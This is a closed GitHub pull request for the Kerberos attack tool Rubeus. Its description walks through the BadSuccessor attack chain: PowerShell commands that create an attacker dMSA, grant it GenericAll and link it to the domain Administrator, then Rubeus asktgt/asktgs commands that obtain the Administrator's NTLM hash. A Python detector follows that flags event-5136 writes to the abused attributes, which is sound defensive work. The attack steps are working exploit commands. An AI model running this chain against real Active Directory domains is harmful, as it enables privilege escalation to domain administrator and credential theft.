
add capability to print previous keys#216

Closed
LazyTitan33 wants to merge 1 commit into GhostPack:master from LazyTitan33:master

Conversation


@LazyTitan33 LazyTitan33 commented Nov 16, 2025

Added a print option for previous keys found in the TGS, including keys of preceding managed accounts. The full attack chain for BadSuccessor now prints the NTLM hash of the Preceding Managed Account as well.

First, create the dMSA account.

New-AdServiceAccount -Name "attacker_dmsa" -DNSHostName "lab.lazy" -Path "OU=Staff,DC=lab,DC=lazy" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "lazytitan"

$sid = (Get-ADUser -Identity "lazytitan").SID
$acl = Get-Acl "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($rule)
Set-Acl -Path "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy" -AclObject $acl


Set-ADServiceAccount -Identity attacker_dmsa -Replace @{
    'msDS-ManagedAccountPrecededByLink' = 'CN=ADMINISTRATOR,CN=USERS,DC=LAB,DC=LAZY'
    'msDS-DelegatedMSAState' = 2
}

Get-ADServiceAccount -Identity attacker_dmsa -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState | Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState

Get a TGT ticket for the account that created the dMSA account.

.\Rubeus.exe asktgt /user:lazytitan /aes256:02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5 /domain:lab.lazy /nowrap /ptt

Request a TGS.

When requesting the TGS it will now print the previous NTLM hash for the managed account as well. In this example, the hash of the Administrator.

.\Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lazy /dmsa /opsec /ptt /nowrap /ticket:<base64 ticket from previous>
[image]
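As an added example from the defender's side (not Rubeus code and not part of this PR), the Python below scans a few constructed Windows Security event records and reports writes to the two attributes the steps above set by hand, msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState, then lists objects that received both. The one-record-per-line key=value layout and every sample line are assumptions made for the example; real 5136 events carry the same field names, but in XML.

```python
"""Flag directory writes that wire up a dMSA predecessor link.

Added example (not Rubeus code and not from this PR). It scans constructed
Windows Security event records and reports added values on the two
attributes the PR description sets by hand, then lists objects that got both.
Assumptions: events arrive as one 'key=value ...' record per line (real 5136
events carry these field names in XML), and the sample data is made up.
"""
from dataclasses import dataclass

WATCHED_ATTRIBUTES = {"msDS-ManagedAccountPrecededByLink", "msDS-DelegatedMSAState"}
DS_OBJECT_MODIFIED = "5136"   # "A directory service object was modified"
VALUE_ADDED = "%%14674"       # OperationType code meaning "Value Added"

# Constructed sample records, not real log data.
SAMPLE_EVENTS = [
    "EventID=5136 SubjectUserName=lazytitan ObjectDN=CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy "
    "ObjectClass=msDS-DelegatedManagedServiceAccount "
    "AttributeLDAPDisplayName=msDS-ManagedAccountPrecededByLink "
    "AttributeValue=CN=Administrator,CN=Users,DC=lab,DC=lazy OperationType=%%14674",
    "EventID=5136 SubjectUserName=lazytitan ObjectDN=CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy "
    "ObjectClass=msDS-DelegatedManagedServiceAccount "
    "AttributeLDAPDisplayName=msDS-DelegatedMSAState AttributeValue=2 OperationType=%%14674",
    # Routine change on an unrelated attribute: must not be reported.
    "EventID=5136 SubjectUserName=helpdesk ObjectDN=CN=printsvc,OU=Staff,DC=lab,DC=lazy "
    "ObjectClass=user AttributeLDAPDisplayName=description AttributeValue=Printer OperationType=%%14674",
    # Removal of a link ("Value Deleted", %%14675): not a write this filter alerts on.
    "EventID=5136 SubjectUserName=admin ObjectDN=CN=old_dmsa,OU=Staff,DC=lab,DC=lazy "
    "ObjectClass=msDS-DelegatedManagedServiceAccount "
    "AttributeLDAPDisplayName=msDS-ManagedAccountPrecededByLink "
    "AttributeValue=CN=svc1,CN=Users,DC=lab,DC=lazy OperationType=%%14675",
    # A different event type entirely (TGT request); ignored.
    "EventID=4768 TargetUserName=lazytitan ServiceName=krbtgt",
]


@dataclass(frozen=True)
class Finding:
    actor: str
    object_dn: str
    attribute: str
    value: str


def parse_event(line: str) -> dict:
    """Split a 'key=value ...' record into a dict.

    DN values contain '=' themselves, so only the first '=' of each
    whitespace-separated token is treated as the separator.
    """
    fields = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def find_predecessor_link_writes(lines):
    """Return one Finding per added value on a watched dMSA attribute."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != DS_OBJECT_MODIFIED:
            continue
        if ev.get("AttributeLDAPDisplayName") not in WATCHED_ATTRIBUTES:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        findings.append(Finding(
            actor=ev.get("SubjectUserName", "<unknown>"),
            object_dn=ev.get("ObjectDN", "<unknown>"),
            attribute=ev["AttributeLDAPDisplayName"],
            value=ev.get("AttributeValue", ""),
        ))
    return findings


def objects_with_full_chain(findings):
    """DNs that received both watched attributes.

    Both on one object is the pattern the PR description walks through;
    either one alone on a dMSA is already worth a look.
    """
    seen = {}
    for f in findings:
        seen.setdefault(f.object_dn, set()).add(f.attribute)
    return sorted(dn for dn, attrs in seen.items() if attrs == WATCHED_ATTRIBUTES)


if __name__ == "__main__":
    hits = find_predecessor_link_writes(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h.actor} set {h.attribute}={h.value} on {h.object_dn}")
    for dn in objects_with_full_chain(hits):
        print(f"predecessor link and state both set on {dn}")
```

Event 5136 is only written when the Directory Service Changes audit subcategory is enabled and the object's SACL covers attribute writes; without that, there is nothing for this filter to match.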

added print option for previous keys found in TGS, including keys of preceding managed accounts
@LazyTitan33 (Author)

better PR #204 already exists for this

